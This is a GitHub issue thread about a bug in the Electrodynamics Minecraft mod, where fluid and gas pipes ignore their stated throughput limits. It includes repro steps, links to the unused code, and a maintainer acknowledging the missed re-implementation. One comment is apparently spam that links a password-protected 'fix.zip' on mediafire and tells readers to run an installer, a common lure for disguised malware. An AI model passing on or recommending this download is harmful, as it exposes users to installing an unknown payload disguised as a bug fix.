### ISSUE TITLE
Fluid and gas pipe throughput limit not respected in practice

### ISSUE THREAD

**Issue by 9thCore** [Aurilisdev/Physica#273]
Despite being described with specific throughput rates, neither fluid or gas pipes respect that and output as much as possible, all the time.
(not shown in video, but also happens with gas pipes)

Repro:
1. Place down any fluid source leading into a pipe
2. Place down pipes leading to a tank
3. Watch as the tank does not get filled in increments of 5k/10k (as per pipe restriction) only
4. Repeat experiment with gasses

Rather unscientific video (shows only the fluid part of the issue, but gasses play the same):
https://github.com/user-attachments/assets/536c01da-2a74-4b9e-9454-2d8053188d19

Slightly more scientific proof:
The only use of [`AbstractNetwork#networkMaxTransfer`](https://github.com/aurilisdev/Electrodynamics/blob/1.20/src/main/java/electrodynamics/prefab/network/AbstractNetwork.java#L27) (related to fluids and gasses) is the [commented-out snippet](https://github.com/aurilisdev/Electrodynamics/blob/1.20/src/main/java/electrodynamics/common/network/type/FluidNetwork.java#L261) in `FluidNetwork`, and no use in `GasNetwork`.
In the same vein, neither is [`IAbstractCable#getMaxTransfer`](https://github.com/aurilisdev/Electrodynamics/blob/1.20/src/main/java/electrodynamics/api/network/cable/IAbstractCable.java#L18) used anywhere except for calculating [`AbstractNetwork#networkMaxTransfer`](https://github.com/aurilisdev/Electrodynamics/blob/1.20/src/main/java/electrodynamics/prefab/network/AbstractNetwork.java#L72).

Technical data:
Minecraft 1.20.1
Forge 47.3.1
Electrodynamics 1.20.1-0.9.1-0

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by skiprocks999** [comment]
kekw I forgot to re-implement that when I was doing the pumps. Good catch.
